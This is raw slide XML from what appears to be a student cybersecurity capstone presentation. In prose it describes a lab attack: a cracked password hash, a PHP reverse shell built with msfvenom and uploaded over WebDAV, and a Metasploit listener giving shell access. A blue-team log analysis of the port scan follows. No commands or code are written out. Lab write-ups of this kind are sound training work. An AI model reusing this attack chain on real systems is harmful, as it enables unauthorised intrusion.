                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I used msfvenom and meterpreter to deliver a payload onto the vulnerable machine (the capstone server)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>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roup 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482F8F6C-1778-45C8-A196-4568C7EE4852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="3014687"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="3228956" y="887903"/>
            <a:chExt cx="533372" cy="533480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3228956" y="887903"/>
              <a:ext cx="533372" cy="4766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3365118" y="1276689"/>
              <a:ext cx="261029" cy="144694"/>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1" name="Google Shape;1141;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="723857" y="3548167"/>
            <a:ext cx="2109620" cy="120299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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723857" y="3548167"/>
            <a:ext cx="2109620" cy="120299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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using the multi/handler exploit I could get access to the machine’s shell.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3095775" y="88790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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E87AEA-4A73-4410-9369-7EB2461A3F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6" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C55EEE3-128C-4F3A-8F9A-0535613663EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3095775" y="1480575"/>
            <a:ext cx="4660927" cy="3321326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="700438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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WebDAV Vulnerability</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724274" y="1480574"/>
            <a:ext cx="2317099" cy="3363095"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718191" y="1421383"/>
            <a:ext cx="2323182" cy="3422286"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>A PHP reverse shell payload was created using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>MSFvenom . Using CrackStation, Ryan’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>password hash was cracked revealing his</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>password. Kali File Manager was used to drag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and drop the payload onto the victim web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>server using Ryan’s credentials and the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WebDAV protocol.</a:t>
            </a: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roup 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{482F8F6C-1778-45C8-A196-4568C7EE4852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3177535" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="3228956" y="887903"/>
            <a:chExt cx="533372" cy="533480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3228956" y="887903"/>
              <a:ext cx="533372" cy="4766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3365118" y="1276689"/>
              <a:ext cx="261029" cy="144694"/>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41" name="Google Shape;1141;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3444211" y="1542459"/>
            <a:ext cx="2109620" cy="3301209"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444211" y="1542459"/>
            <a:ext cx="2109620" cy="3301209"/>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ability to establish a reverse shell after</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>uploading and opening the PHP payload on the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>victim system. The payload opened a listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>on port 4444. Using Metasploit, the PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse shell exploit was used to allow remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connection to the web server and explore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>folders, including the root folder…</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5767365" y="88790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Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E87AEA-4A73-4410-9369-7EB2461A3F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7" name="Picture 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D299FDC4-D8B5-4787-BA1E-6F73455C99D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624734" y="1542459"/>
            <a:ext cx="2883867" cy="1525419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a phone&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7922CB-6D11-4F4A-B27B-BA8C2A8A8F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5625439" y="3179794"/>
            <a:ext cx="2883162" cy="1663874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427246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Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="3400" dirty="0">
              <a:latin typeface="+mj-l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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F7FBDE6-BF72-4EEB-8950-65A19D4131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latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a screenshot of Kibana logs depicting the port scan. </a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="626750"/>
            <a:ext cx="84093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000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The port (192.168.1.90) scan occurred on August 7, 2021 @ 15:05 UTC or 11:05 EST </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>There were total of 118,659 hits and 4 requests were made for the secret folder and files contained in the secret folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The file to connect_to_corp_server was requested and returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This file contained instructions for the connections to the WebDAV server, as well as the username: ryan, and the hash password to use.</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="830600"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C61D59E-DD5C-4855-A527-9AD55155DD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0" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F4F73C-C760-4E58-B72B-4105ABD8758F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="1633503"/>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DECDFFE7-2245-4316-A567-5C5ED9FA5803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3101303"/>
            <a:ext cx="2666654" cy="1936444"/>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1C11FCF0-DC20-4209-9B7C-A4DC8001DA2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4943060" y="3099188"/>
            <a:ext cx="2498779" cy="1940933"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F42EE12E-E346-405F-8989-74FD4C1F7620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
